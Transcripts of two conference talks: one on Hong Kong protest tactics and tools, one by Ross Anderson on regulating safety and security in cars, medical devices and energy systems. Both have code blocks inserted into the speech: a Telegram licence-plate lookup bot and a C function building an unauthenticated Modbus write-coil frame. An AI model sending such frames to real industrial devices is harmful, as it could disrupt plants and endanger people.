In both of these pieces of art you can see the recognizable frontliner on the left — in both cases he has the hard hat and a bit more gear, ready to get into a fight with the police — but next to the frontliner you in both cases have someone who just put on a mask, maybe came straight from the office or straight from school. Those people are working together, because if you had only one of those groups, you probably wouldn't have been able to keep going for half a year. Another group I think is really interesting is logistics, because people have adapted all these strategies for dealing with whatever the police throw at them. A year ago, or even a couple of months ago, tear gas was still something that made people leave, and a water cannon would scare people away, but people have really adapted, and to be very honest, tear gas doesn't do that much in Hong Kong anymore. One person I talked to, who is 19 — I asked: doesn't the tear gas sting? And they said: well, the first time, yes, but then you get used to it and you just keep going. To do that you need all this gear: you need to be equipped, you need hard hats, you need all these umbrellas. So there are people in the background collecting material near big protest sites where they know there will be protests; they carry it around in cartons, in some cases they collect different types of shields, and when it comes to a clash with the police they make sure that stuff gets passed on to the front lines. I didn't include it in the presentation, but there are incredible videos of, in some cases, maybe kilometer-long human chains where tons of peaceful protesters pass things along to make sure they reach the people who are in the clash with police. Logistics are the people who make sure the stuff is around, is at these collection points, and is then given to the people who really need it. One person I spoke to who did a lot of logistics said: I'm not someone who would fight with the police in this movement, but I still want to give some help, so I decided to manage resources such as medical supplies or protest gear. Medical supplies might be, for example, saline solution, which you can use to wash people's eyes out if they've been hit by pepper spray or tear gas. So this is someone who said: I am not a frontliner and I'm not going to be part of that, but I will be right there — I think these people are doing important work, and I'm going to do what's in my power to make sure they have what they need. First aiders are incredibly important in the movement as well, because people have started to seriously mistrust hospitals: they're worried that the government might go and get their hospital records if they get injured in a clash with police — which might include getting beaten up by police.
There have been people — there was one person who was shot in the chest and who tried to run from the police, almost succeeded, but was then arrested. So if someone like that doesn't trust the hospitals and doesn't go to one, first aiders are the ones who are going to treat those injuries. These people are around, are visibly marked as first aiders, and make sure people get as much medical treatment as they need, to the extent that they are able to provide it. There was one incredibly hard situation for them, I think in November, when people were occupying the Chinese University of Hong Kong and there was a real battle — you basically had a front line like you see in movies where someone is trying to take a castle — where people kept getting hit and injured, and first aiders kept running in and out, grabbing people and carrying them to a big sports field that was just full of injured people, where they treated all of them. And all of these are volunteers. There are more people in the background, and I could keep going about this — my friends can attest to the fact that I can talk about this for an hour or longer. One other group I wanted to quickly talk about are the people who drive the "school buses". School buses are code for cars that go to protest sites and pick people up. For example, when all those people were stuck at the airport, literally thousands of Hong Kongers grabbed their own cars, drove out and said: we will pick people up. They post on Telegram and say: hey, I'm a parent, I'm going to pick up my children, I have space for three people. This is why I used that image — it's like parents taking care of the kids, very wholesome imagery. And they have a code: if you say you have stationery in your car, that means you have clothes people can change into, so if someone is wearing all black, you have something else for them to wear. There are entire Telegram channels where every post is just someone going from A to B. It says when they're leaving, how much space they have, and often whether there's a female driver, so people can feel safe. And to make sure you don't accidentally get picked up by undercover cops, people maintain an unofficial database of cars that have been identified as undercover cop cars. So there's a Telegram bot: once you have someone's license plate, you go to the bot and ask, is this a cop? — and the bot tells you yes or no (a minimal sketch of how such a lookup could work follows below). In addition to that, there are countless working groups where people are just working around the clock. This is an example from a PR translation working group that translated this particular poster from the original Chinese into a bunch of languages — one of them is German on the left, another is Korean on the right. It says: Hong Kong is facing a humanitarian crisis. What I think is interesting about this is that some of these groups are basically working around the clock. If something happens in Hong Kong during the day, by evening protest art often comes out that reframes an incident or tries to explain what protesters did, if they feel they need to explain themselves.
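To make the license-plate check mentioned above a bit more concrete: a lookup bot like that only needs a crowdsourced list and a reply loop. Here is a minimal, purely hypothetical sketch against the public Telegram Bot API — the token, the data file and the exact reply wording are assumptions of mine, not the real bot:

```python
# Hypothetical sketch of a license-plate lookup bot (Telegram Bot API).
# It checks incoming plate numbers against a crowdsourced list and replies.
import requests

BOT_TOKEN = "123456:ABC-placeholder-token"
API = f"https://api.telegram.org/bot{BOT_TOKEN}"


def load_flagged_plates(path: str = "flagged_plates.txt") -> set[str]:
    # One crowdsourced plate number per line, e.g. "AB1234".
    with open(path) as f:
        return {line.strip().upper() for line in f if line.strip()}


def answer_queries() -> None:
    flagged = load_flagged_plates()
    offset = None
    while True:
        updates = requests.get(f"{API}/getUpdates",
                               params={"offset": offset, "timeout": 30}).json()
        for update in updates.get("result", []):
            offset = update["update_id"] + 1
            msg = update.get("message") or {}
            plate = (msg.get("text") or "").strip().upper()
            if not plate:
                continue
            verdict = ("flagged as a suspected undercover police car"
                       if plate in flagged
                       else "not on the list (no guarantee it is safe)")
            requests.get(f"{API}/sendMessage", params={
                "chat_id": msg["chat"]["id"],
                "text": f"{plate}: {verdict}",
            })


if __name__ == "__main__":
    answer_queries()
```

The hard part, of course, is not the bot but keeping the crowdsourced list accurate and trustworthy.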
And then Hong Kongers sleep — and the translation work follows the sun: people who live in Europe, but who in many cases are still from Hong Kong, and people who live in the United States, work through their evenings and their mornings. So by the time Hong Kongers wake up, they often have these messages ready in different languages. This happened during the airport protest: on the morning of the 13th, people woke up to posters in maybe ten different languages that explained what was happening in Hong Kong, printed them, and went to the airport straight away at 8 a.m. I want to share one more story, because I think it's one of the most gut-wrenching examples of what people have been able to achieve just by cooperating, and by being completely anonymous together. During the siege at the Polytechnic University in Hong Kong, when hundreds of people were stuck inside and didn't want to go out, Susan Satellin reported for Quartz that there was at least one person, and probably more, who managed to get out of the university through the sewers. This person went down into the sewers, wading through probably chest-high wastewater in the dark, not knowing where they were going — and they were actually able to escape the university that way, because they were talking to people on Telegram who had dug up maps of the Hong Kong sewage system and were directing them: this is where you go, you hit a crossroads and then you take a left, here you take a right. At the last moment their plan was changed: they were told, you cannot go to the exit we initially told you, because we've seen police there — Telegram channels again, all of this comes back together, people watching police movements — so we need to send you to a different exit. So he goes to that exit, and there's someone waiting there who lifts the lid and lets him out of the fucking sewage system. And then there are people waiting for him — a school bus — who grab him and take him somewhere else, and that's how he got out of the university. And he still doesn't know any of those people. They're all still strangers.

Strategy number six, which I think is important: counter-narratives. The Hong Kong government and the Beijing government have a very clear framing for the entire protest: they want to say these are vandals, these are rioters, they have no legitimate demands, they just want to destroy things — nothing about them is legitimate or democratic or politically justified in any way. People realized that memes are nice, but memes are maybe not enough. So part of the movement started a citizens' press conference, where people anonymously hold a press conference — and you can see that the press actually comes, because you have all the official mics there, all these media outlets going there and talking to them. In the background you have someone interpreting into sign language. They know: we need to at least try to get some control of the narrative ourselves, to make sure it's not just the government that gets to define what is happening. The last strategy I want to talk about is related both to counter-narratives and to organizing and mobilizing, which is the last thing I want to talk about.
So as an introduction to that, I want to show you a video that in many ways demonstrates some of the capacity people have been able to build. What I'm going to show you is a protest anthem called "Glory to Hong Kong". As I said earlier, Hong Kong is a city that was first under colonial rule by the British and is now under rule by China, without people really getting a choice at any point. In early September, people crowdsourced an anthem for the city online: someone composed it and published it on September 11th, several days later someone had arranged it for an orchestra, and right after that, this video went online.

[Video plays: "Glory to Hong Kong", performed by an orchestra.]

If you are interested in the meaning of that song, I would recommend that you go and read Vivian Chow's article about it in the New York Times, because she wrote, from a musical and cultural perspective, about what it meant for her to have grown up in a city where there was never a song she identified with, and for this to be the first time there was something like an anthem for what she considers her home. So yeah, I would recommend you all go and read that. In the long term, a lot of the strategies I've talked about have been able to sustain the movement and have helped individuals evade arrest in the short term — but the question is how sustainable this entire movement is in the long run. The orchestra, by the way — they call themselves the Black Bloc Orchestra — is a fun example of how people can just get tons of people together, suddenly come up with an entire orchestra, and film the whole thing with pretty good production value. I just downloaded a shitty version. So that's happening: people are building all these groups, building all these new ties. A lot of the time they're building ties with people they don't know and who are anonymous to them, but in a lot of other cases it's the opposite. One person I spoke to said they've started exercising together as a neighborhood, because, as he put it, we cannot trust the police to save us, and if someone from the government comes to attack us, we want to be able to defend ourselves. So he's organizing this in small neighborhood groups. There are all these people who have lived in an anonymous major metropolis for years and probably barely talked to each other, but who are now getting together, starting to do things together, and trying to keep these things going to protect themselves. Another thing is that there has been a push for building and creating labor unions: more than 24 have been formed this year across a range of sectors. There were several attempts at organizing strikes in Hong Kong over the summer, and a lot of those weren't very successful, because people still went to work in many cases. But people are essentially organizing for the longer term and trying to get people to join unions, so that they have organizing capacity for the long run. And again, this is a picture from the district council elections — it's incredibly important to recognize the organizational capacity that went into those elections.
There are all these people out there now who know how to mobilize and have taken part in a political campaign, an electoral campaign, and all of that is knowledge that now exists among young people and older people alike. All of these are organizations and structures that people will hopefully be able to build on in the long run. So what next? I think it's important to recognize that what people have been able to do in Hong Kong is incredible in terms of organizational capacity, and also that people have given up a lot in many cases. People have gone broke. There are young people who have been kicked out of their homes by their parents because they don't see eye to eye politically. Some people have spent all their money on protest gear. Other people are facing charges of up to 10 years in prison and, because of the incredible backlog, might not know for a very long time what's going to happen. People are scared of the police. So one big question is how things will be able to keep going. And if you talk to someone from Hong Kong who's part of the protest movement, one thing that's incredibly important to recognize is that everyone in Hong Kong — people on both sides — these are real people. They are not just acting out some geopolitical game like Risk; these are real people who in many cases are really going to their limits. More specifically, there is a rally planned and announced for January 1st. They're still waiting for the letter of no objection, which means they don't yet know whether it will be a legal rally or not. So this is really going to be the movement trying to show that it can keep going through 2020 and maybe longer. The unrest and the discontent are not going to go away — I think that's very clear. So many people have been politicized over the past few months, and so many people have lost trust in their government and in very fundamental institutions such as hospitals and the police. That's not just going to go away; it's going to be a problem that will haunt the government for a long time to come. Especially — remember that number — with almost 100% of people under 16 opposed to the extradition bill, and those people deeply involved and incredibly politicized, the people who are coming up are, if anything, more anti-government and more willing to go out and protest than anyone who's already in the streets. As for things that you can do: go and follow Hong Kong journalists and support them. If you're on Twitter, Laurel Chor and Hong Kong Hermit — I've linked both of them — have Twitter lists where you can follow local journalists who live in Hong Kong, who grew up in the city, and who have been reporting on the protests for months, in some cases for years. A lot of them already reported on the Umbrella revolution, so go and follow them, because they have the best information: they speak the language and they can report firsthand. You'll also run into those crazy livestream websites. You should also follow and donate to Hong Kong Free Press, which is an independent media outlet that was formed after the Umbrella protests and has been doing some incredible coverage. They hired a really good photographer who took a bunch of the pictures you saw here — and she was at some point herself arrested by police for allegedly participating in a riot.
So yeah, go do that, follow those people. This is a story that is not over, and it will not be over any time soon. And so the only thing I can tell you is to go to the source and listen to the people who are right on the ground. Last but not least, I can only speak about things that pertain to China, because that's my area of expertise, or in this case, Hong Kong. But this has been a year with a lot of protest movements all over the world, and Hong Kongers are far from the only people who went onto the streets at great, immense personal risk to stand up to their governments. In India, in student protests against the anti-Muslim exclusion law, I think 17 or 20 people were killed in the past few weeks, and the Iraqi government just gunned down protesters that went out to protest for political rights. People have been protesting in Chile, in Iran, in Syria, in a bunch of places. And those things might not be as well covered necessarily as Hong Kong. I certainly don't read about them as much, but that's also my personal interest. But I would encourage you, if you care about the things that people in Hong Kong are trying to achieve, I would urge you to inform yourself about the things that are happening in other places as well. And in a lot of cases, people who are in these places recognize that they stand for similar things, right? They want their governments to listen to them, and they want to be represented. On the left, you have graffiti from Lebanon, where in the middle you can see the Hong Kong slogan, five demands, not one less, in Chinese, stenciled on the wall. And on the left and the right, you have Iraqi and Lebanese protest slogans that call for all corrupt government officials to resign, regardless of which ethnic and religious faction they're part of. Whereas on the right, you have a protest poster from someone from Hong Kong who just lists all these protests and says we're fighting for the same thing, we're fighting for freedom and justice, and so we should feel like we're part of the same thing. And so I just want to urge you that if you care about any of these things, then you should probably care about it in more than one place. Thank you. Thank you. Thank you, Catherine. I don't know if I told you, but I asked for this shift specifically because of your talk. Thank you. It was everything I expected, and more. So we have time for two or three questions. We'll take one question from the internet, because there are a lot of people who couldn't make it. Yeah. So it seems that Telegram is used a lot during protests, and one of the IRC users mentions that it's centralized, and asks if there were any problems with this centralized and controlled thing, and if there are attempts to move this to decentralized communication solutions. Thank you. I think, oh, I just saw that I misspelled MIT in my email. That's very smart. The Telegram question is important. So Telegram has actually come under DDoS attack multiple times. The first time was in the summer, and there was another time later, like a couple of weeks ago, so that shows clearly that Telegram is a vulnerability in some ways, right? In the summer after the DDoS attack, Telegram said that they think it was a nation state actor just based on the volume of the DDoS attack. So that is kind of like a point of vulnerability. In reaction to that and another DDoS attack on LIHKG, there were some discussions of moving to other platforms, but those ultimately didn't pan out.
So I think organizationally, it is probably not ideal to be working on a centralized platform, but the crucial question is whether you have alternatives that people can get on easily, because you're organizing so many people, and you really want the smallest amount of friction possible. And I think that is the biggest challenge. So there were kind of like proposals for using different apps that, for example, work without Internet for the worst case scenario that the government might switch off the Internet in Hong Kong. But my read is that those ultimately didn't pan out because those are not necessarily apps that people are used to that might not be as easy to use, and also because there is kind of like an institutional stickiness. So I think it would probably take some kind of disaster, like either Telegram getting blocked or taken down in Hong Kong, or kind of like being completely taken down by DDoS attack for people to actually switch to another platform. So I think there, I agree, from a security perspective, it's probably not ideal, but the biggest challenge is the kind of the organizational challenge of getting people to move wholesale to a completely different platform. Thank you. And now one question from the audience. Microphone number three, it's the last question, so make it count. That's a lot of responsibility, but I really wanted to ask about police brutality. You mentioned that people were surprised by police brutality, but how can it be a surprise? So it's only new police force, continental China, who became suddenly brutal, or people were not paying attention, or was police brainwashed? Thank you. This is a good question. I think we have absolute answers to this. The reason people were surprised is that the Hong Kong police force used to have an incredibly good reputation as a police force that was very reasonable and appropriate in its use of force, and that's clearly a reputation that's completely gone down the drain over the past few months. The thing about police coming in from China is something there are repeated reports, but they're always incidental, and I haven't really seen any large-scale verified reports that there was any major influx of mainland police officers into the Hong Kong police, so it's probably not that. I think one thing that people observed after the umbrella movement was that there was kind of a siege mentality within the police itself, so that they felt like they were being assaulted by the entirety of society, so it's possible that that was kind of like the formation of increasingly strictly drawn lines and camps, where the police felt like they're under assault from everyone else and that they're justified in using force, which might be one of the explanations why they've also been so opposed to kind of like an independent investigation. In addition to that, another thing is that they've also been completely operating at capacity, so we know that they've paid, I think, 900 million Hong Kong dollars or something, an absurd amount in overtime pay to the police. So I think one thing is also that these are people who in many cases are not trained in dealing with the events that they're supposed to be dealing with, and so it seems that they are possibly reacting by lashing out in more violent ways than would probably be appropriate, so it might just also be a lack of training, but there's no definitive answer. Thank you. Thanks. 
Catherine Tai, who has been heroically standing here for 90 minutes, talking nonstop, which is hard, people, so a huge round of applause.
The people of Hong Kong have been using unique tactics, novel uses of technology, and a constantly adapting toolset in their fight to maintain their distinctiveness from China since early June. Numerous anonymous interviews with protesters, from frontliners to middle class supporters and left wing activists, reveal a movement that has been unfairly simplified in international reporting. The groundbreaking reality is less visible because it must be - obfuscation and anonymity are key security measures in the face of jail sentences of up to ten years. Instead of the big political picture, this talk uses interviews with a range of activists to help people understand the practicalities of the situation on the ground and how it relates to Hong Kong's political situation. It also provides detailed insights into protestors' organisation, tactics and technologies, way beyond the current state of reporting. Ultimately, this is the story of how and why Hongkongers have been able to sustain their movement for months, even faced with an overwhelming enemy like China. The protestors have developed a range of tactics that have helped them minimise capture and arrests and helped keep the pressure up for five months. They include enforcing and maintaining anonymity, both in person and online, rapid dissemination of information with the help of the rest of the population, a policy of radical unanimity to maintain unity in the face of an overwhelming enemy, and Hongkongers’ famous “be water” techniques, through which many of them escaped arrest.
10.5446/53129 (DOI)
Our next speaker is a professor of security engineering at Cambridge University. He is the author of the book Security Engineering. He has done a lot of things already. He has been inventing semi-invasive attacks based on inducing photocurrents. He has done API attacks. He has invented a lot of stuff. If you read his bio, it feels like he's involved in almost everything related to security. So please give a huge round and a warm welcome to Ross Anderson and his talk, The Sustainability of Safety, Security and Privacy. Thanks. Right, it's great to be here. I'm going to tell a story that starts a few years ago. It's about the regulation of safety. Just to set the scene, you may recall that in February this year, there was this watch, Enox's Safe-KID-One, which suddenly got recalled. Why? Well, it turned out that it had unencrypted communications with a back-end server, allowing unauthenticated access. Translated into layman's language, that meant that hackers could track and call your kids, change the device ID and do arbitrary bad things. This was immediately recalled by the European Union using powers that it had under the Radio Equipment Directive. This was a bit of a wake-up call for industry, because up until then, people active in the so-called Internet of Things didn't have any idea that if they produced an unsafe device, then they could suddenly be ordered to take it off the market. Anyway, back in 2015, the European Union's research department asked Éireann Leverett, Richard Clayton and me to examine what IoT implied for the regulation of safety, because the European institutions regulate all sorts of things from toys to railway signals and from cars through drugs to aircraft. If you start having software in everything, does this mean that all these dozens of agencies suddenly start to have software safety experts and software security experts? So what does this mean in institutional terms? We produced a report for them in 2016, which the Commission sat on for a year. A version of the report came out in 2017 and later that year, the full report. The gist of our report was that once you get software everywhere, safety and security become entangled. In fact, when you think about it, the two are the same in pretty well all the languages spoken by EU citizens. It's only English that distinguishes between the two. With Britain leaving the EU, of course, you will have languages in which safety and security become the same throughout Brussels and throughout the continent. But anyway, how are we going to update safety regulation in order to cope? This was the problem that Brussels was trying to get its head around. So one of the things that we had been looking at over the past 15, 20 years is the economics of information security, because often big complex systems fail because the incentives are wrong. If Alice guards a system and Bob pays the cost of failure, you can expect trouble. And many of these ideas go across to safety as well. Now, it's already well known that markets do safety in some industries such as aviation way better than in others such as medicine. And cars were dreadful for many years. For the first 80 years of the car industry, people didn't bother with things like seat belts. And it was only when Ralph Nader's book, Unsafe at Any Speed, led the Americans to set up the National Highway Traffic Safety Administration, and various court cases brought this forcefully to public attention, that car safety started to become a thing.
Now, in the EU, we've got a whole series of broad frameworks and specific directives and detailed rules. And there's over 20 EU agencies plus the UNECE in play here. So how can we navigate this? Well, what we were asked to do was to look at three specific verticals and study them in some detail so that the lessons from them could then be taken to the other verticals in which the EU operates. And cars were one of those. And some of you may remember the CarShark paper in 2011, where a group from San Diego and the University of Washington figured out how to hack a vehicle and control it remotely. And I used to have a lovely little video of this that the researchers gave me, but my Mac got upgraded to Catalina last week and it doesn't play anymore. Yeah. OK. We'll get it going sooner or later. OK, this was largely ignored, because one little video didn't make much of an impact. But in 2015, this suddenly came to the attention of the industry, because Charlie Miller and Chris Valasek, two guys who had been in the NSA's hacking team, hacked a Jeep Cherokee using Chrysler's Uconnect. And this meant that they could go down through all the Chrysler vehicles in America and look at them one by one and ask, where are you? And then when they found a vehicle that was somewhere interesting, they could go in and do things to it. And what they found was that to hack a vehicle, suddenly you just needed the vehicle's IP address. And so they got a journalist into a vehicle and they got him to slow down and had trucks behind him hooting away and eventually they ran the vehicle off the road. And when the TV footage of this got out, suddenly people cared. It made the front pages of the press in the USA and Chrysler had to recall 1.4 million vehicles for a software fix, which meant actually reflashing the firmware of the devices. And it cost them billions and billions of dollars. So all of a sudden, this is something to which people paid attention. Some of you may know this chap here, at least by sight. This is Martin Winterkorn, who used to run Volkswagen, and when it turned out that he had hacked millions and millions of Volkswagen vehicles by putting in evil software that defeated emissions controls, that's what happened to Volkswagen's stock price. Oh, and he lost his job and got prosecuted. So this is an important point about vehicles and in fact about many things in the Internet of Things or Internet of Targets, whatever you want to call it. The threat model isn't just external, it is internal as well. There are bad people all the way up and down the supply chain, even at the OEM. So that's the state of play in cars and we investigated that and wrote a bit about it. Now here's medicine. This was the second thing that we looked at. These are some pictures of the scene in the intensive care unit in Swansea Hospital. So after your car gets hacked and you go off the road, this is where you end up. And just as a car has got about 50 computers in it, you're now going to see that there's quite a few computers at your bedside. How many CPUs can you see? You see there's quite a few. About a comparable number to the number of CPUs in your car. Only here the systems integration is done by the nurse, not by the engineers at Volkswagen or Mercedes. And does this cause safety problems? Oh sure. Here are pictures of the user interface of infusion pumps taken from Swansea's intensive care unit. And as you can see, they're all different.
This is a little bit like if you suddenly had to drive a car from the 1930s, an old Lanchester for example, and then you find that the accelerator is between the brake and the clutch. Right? Honestly, there used to be such cars. You can still find them at antique car fairs, or a Model T Ford, for example, where the accelerator is actually a lever on the dashboard and one of the pedals is a gear change. And yet you're asking nurses to operate a variety of different pieces of equipment. And look for example at the Bodyguard 545. At the one on the top, to increase the dose, right, this is the morphine that is being dripped into your vein once you've had your car crash, to increase the dose you have to press two and to decrease it you have to press zero. And at the Bodyguard 545 on the bottom right, to increase the dose you press five and to decrease it you press zero. And this leads to accidents, to fatal accidents, a significant number of them. Okay, so you might say, well, why not have standards? Well, we have standards. We've got standards which say that litre should always be a capital L so it is not confused with a one. And then you see that on the Bodyguard on the bottom right, millilitres is a capital L in green. Okay, well done, Mr. Bodyguard. The problem is if you look up two lines, you see 500 millilitres is in small letters. So there's a standards problem. There's an enforcement problem. And there's externalities, because each of these vendors will say, well, everybody else should standardize on my kit. And there are also various other market failures. So the expert who's been investigating this is my friend Harold Thimbleby, who's a professor of computer science at Swansea. And his research shows that hospital safety usability failures kill about 2,000 people every year in the UK, which is about the same as road accidents. And safety usability, in other words, gets ignored because the incentives are wrong. In Britain and indeed in the European institutions, people tend to follow the FDA in America. And that is captured by the large medical device makers over there. They only have two engineers; they're not allowed to play with pumps, et cetera, et cetera, et cetera. The curious thing here is that as safety and security come together, the safety of medical devices may improve, because as soon as it becomes possible to hack a medical device, then people suddenly care. So the first of these was when Kevin Fu and researchers at the University of Michigan showed that they could hack the Hospira infusion pump over Wi-Fi. And this led the FDA to immediately panic and blacklist the pump, recalling it from service. But then Kevin said, what about the 200 other infusion pumps that are unsafe because of the things on the previous slide? And the FDA said, we couldn't possibly recall all those. Then two years ago, there was an even bigger recall. It turned out that 450,000 pacemakers made by St. Jude could similarly be hacked over Wi-Fi. And so their recall was ordered. And this is quite serious, because if you've got a heart pacemaker, it's implanted surgically in the muscle next to your shoulder blade. And to remove that and replace it with a new one, which they do every 10 years to change the battery, is a day-case surgery procedure. You have to go in there, get an anesthetic. They have to have a cardiologist ready in case you have a heart attack. It's a big deal. It costs maybe 3,000 pounds in the UK.
And so 3,000 pounds times 450,000 pacemakers, multiplied by two for American healthcare costs, and you're talking real money. So what should Europe do about this? Well, thankfully, the European institutions have been getting off their butts on this, and the medical device directives have been revised. And from next year, medical devices will have to have post-market surveillance, a risk management plan, ergonomic design. And here's perhaps the driver for software engineering, for devices that incorporate software. The software shall be developed in accordance with the state of the art, taking into account the principles of development life cycle, risk management, including information security, verification and validation. So there, at least, we have a foothold. And it continues, devices shall be designed and manufactured in such a way as to protect as far as possible against unauthorized access that could hamper the device from functioning as intended. Now, it's still not perfect. There are various things that the manufacturers can do to wriggle, but it's still a huge improvement. The third thing that we looked at was energy: electricity substations and electrotechnical equipment in general. There have been one or two talks at this conference on that. Basically, the problem is that you've got a 40-year lifecycle for these devices. Protocols such as Modbus and DNP3 don't support authentication. And the fact that everything has gone to IP networks means that, as with the Chrysler Jeeps, anybody who knows your IP address can read from it, and with an actuator's IP address, you can activate it. So the only practical fix there is to re-perimeterise, and the entrepreneurs who noticed this 10 to 15 years ago and set up companies like Belden have now made lots and lots of money. Companies like BP now have thousands of such firewalls, which isolate their chemical and other plants from the internet. So one way in which you can deal with this is having one component that connects you to the network, and you replace it every five years. That's one way of doing, if you like, sustainable security for your oil refinery. But this is a lot harder for cars, which have got multiple RF interfaces. A modern car has maybe 10 interfaces. You know, there's the internal phone, there's the short-range radio link for remote key entry, there are links to the devices that monitor your tyre pressure, there's all sorts of other things. And every single one of these has been exploited at least once. And there are particular difficulties in the auto industry because of the fragmented responsibility in the supply chain between the OEMs and the tier ones and the specialists who produce all the various bits and pieces that get glued together. Anyway, so the broad questions that arise from this include, who will investigate incidents and to whom will they be reported? Right? How do we embed responsible disclosure? How do we bring safety engineers and security engineers together? This is an enormous project, because security engineers and safety engineers use different languages. We have different university degree programs. We go to different conferences. And the world of safety is similarly fragmented between the power people, the car people, the naval people, the signal people, and so on and so forth. Some companies are beginning to get this together. The first is Bosch, which put together their safety engineering and security engineering professions.
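As an aside on the point above about Modbus and DNP3 not supporting authentication, here is a small illustrative sketch (mine, not from the talk) that builds a standard Modbus/TCP write-single-coil request. The thing to notice is what is missing: there is no credential, signature or session key anywhere in the frame, so anyone who can reach the device's TCP port 502 can tell it to switch an output on or off.

#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Build a Modbus/TCP "Write Single Coil" request. Note what is absent:
 * there is no credential, signature or session key anywhere in the frame.
 * Anyone who can reach TCP port 502 on the device can send this. */
static size_t modbus_write_coil(uint8_t buf[12], uint16_t tx_id,
                                uint8_t unit, uint16_t coil, int on)
{
    buf[0] = tx_id >> 8;  buf[1] = tx_id & 0xff;  /* transaction id         */
    buf[2] = 0x00;        buf[3] = 0x00;          /* protocol id (always 0) */
    buf[4] = 0x00;        buf[5] = 0x06;          /* bytes that follow      */
    buf[6] = unit;                                /* unit (slave) id        */
    buf[7] = 0x05;                                /* function: write coil   */
    buf[8] = coil >> 8;   buf[9] = coil & 0xff;   /* coil address           */
    buf[10] = on ? 0xff : 0x00;                   /* 0xFF00 = on,           */
    buf[11] = 0x00;                               /* 0x0000 = off           */
    return 12;
}

int main(void)
{
    uint8_t frame[12];
    size_t n = modbus_write_coil(frame, 1, 1, 0, 1);
    for (size_t i = 0; i < n; i++)
        printf("%02x ", frame[i]);
    printf("\n");
    return 0;
}

This only prints the twelve bytes; on a real network they would simply be written to a plain TCP connection. That is why the practical fix described above is to re-perimeterise: put a firewall in front of the device rather than trying to retrofit authentication onto equipment with a 40-year lifecycle.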
But even once a company has brought those professions together in organizational terms, how do you teach a security engineer to think safety, and vice versa? Then there's the problem that bothered the European Union: are the regulators all going to need security engineers? Right? I mean, many of these organizations in Brussels don't even have an engineer on staff. Right? They are mostly full of lawyers and policy people. And then of course, for this audience, how do you prevent abuse of lock-in? In America, if you've got a tractor from John Deere, and you don't take it to a John Deere dealer every six months or so, it stops working. Right? And if you try and hack it so you can fix it yourself, then John Deere will try to get you prosecuted. We just don't want that kind of stuff coming over the Atlantic and to Europe. So we ended up with a number of recommendations. We thought that we would get vendors to self-certify for the CE mark that products could be patched if need be. That turned out to be not viable. We then came up with another idea, that things should be secure by default, for the update of the Radio Equipment Directive, and that didn't get through the European Parliament either. It was Mozilla that lobbied against it. Eventually, we got something through which I'll discuss in a minute. We talked about requiring a secure development life cycle with vulnerability management, because we've already got standards for that. We talked about creating a European security engineering agency, so there would be people in Brussels to support policy makers. And the reaction to that a year and a half ago was to arrange for ENISA to be allowed to open an office in Brussels, so that they can hopefully build a capability there with some technical people who can support policy makers. We recommended extending the product liability directive to services. There is enormous pushback on that. Companies like Google and Facebook and so on don't like the idea that they should be as liable for mistakes made by Google Maps as, for example, Garmin is liable for mistakes made by its navigators. And then there's the whole business of how do you take the information that European institutions already have on breaches and vulnerabilities and report this not just to ENISA, but to safety regulators and users, because somehow you've got to create a learning system. And this is perhaps one of the big pieces of work to be done. Once all cars are semi-intelligent, once everybody's got telemetry and once there is more and more data everywhere, then whenever there's a car crash, the data has to go to all sorts of places, to the police, to the insurers, to courts, and then of course up to the car makers and regulators and component suppliers and so on. How do you design the system that will cause the right data to get to the right place, which will still respect people's privacy rights and all the various other legal obligations? This is a huge project and nobody has really started to think yet about how it's going to be done. At present, if you've got a crash in a car like a Tesla, which has got very good telemetry, you basically have to take Tesla to court to get the data, because otherwise they won't hand it over. We need a better regime for this. And that at present is a blank slate. It's up to us, I suppose, to figure out how such a system should be designed and built, and it will take many years to do it. If you want a safe system, a system that learns, this is what it's going to involve.
But there's one thing that struck us after we'd done this work. After we'd delivered this to the European Commission and I'd gone to Brussels and given a talk to dozens and dozens of security guys, Richard Clayton and I went to Schloss Dagstuhl for a week-long seminar on some other security topic. And we were just chatting one evening and we said, well, what did we actually learn from this whole exercise on standardization and certification? Well, it's basically this. There are two types of secure thing that we currently know how to make. The first is stuff like your phone or your laptop, which is secure because you patch it every month, right? But then you have to throw it away after three years because Larry and Sergey don't have enough money to maintain three versions of Android. And then we've got things like cars and medical devices where we test them to death before release. And we don't connect them to the internet and we almost never patch them, unless Charlie Miller and Chris Valasek are going to go at your car, that is. So what's going to happen to support costs now that we're starting to patch cars? And you have to patch cars because they're online. And once something's online, right, anybody in the world can attack it. So if a vulnerability is discovered, it can be scaled. And something that you could previously ignore suddenly becomes something that you have to fix. And if you have to pull all your cars into a garage to patch them, that costs real money. So you need to be able to patch them over the air. So all of a sudden, cars become like computers and phones. So what's this going to mean? So this is the trilemma. If you get a standard safety life cycle, there's no patching. You get safety and sustainability. But you can't go online because you'll get hacked. And if you get the standard security life cycle, you get patching, but that breaks the safety certification. So that's a problem. And if you get patching plus redoing safety certification with current methods, then the cost of maintaining your safety rating can be sky high. So here's the big problem. How do you get safety, security, and sustainability at the same time? Now, this brings us to another thing that a number of people at this Congress are interested in, the right to repair. This is the Centennial Light. It's been burning since 1901. It's in Livermore in California. It's kind of dim, but you can go there and you can see it. It's still there. In 1924, the three firms who dominated the light business, GE, Osram, and Philips, agreed to reduce average bulb lifetimes from 2,500 to 1,000 hours in order to sell more of them. And one of the things that's come along with CPUs and communications and so on, with smart stuff to use that horrible word, is that firms are now using online mechanisms, software, and cryptographic mechanisms in order to make it hard or even illegal to fix products. And I believe that there's a case against Apple going on in France about this. Now you might not think it's something that politicians will get upset about, that you have to throw away your phone after three years instead of after five years. But here's something you really should worry about: vehicle life cycle economics. Because the lifetimes of cars in Europe have doubled in the last 40 years. And the average age of a car in Britain when it is scrapped is now almost 15 years. So what's going to happen once you've got wonderful self-driving software in all the cars?
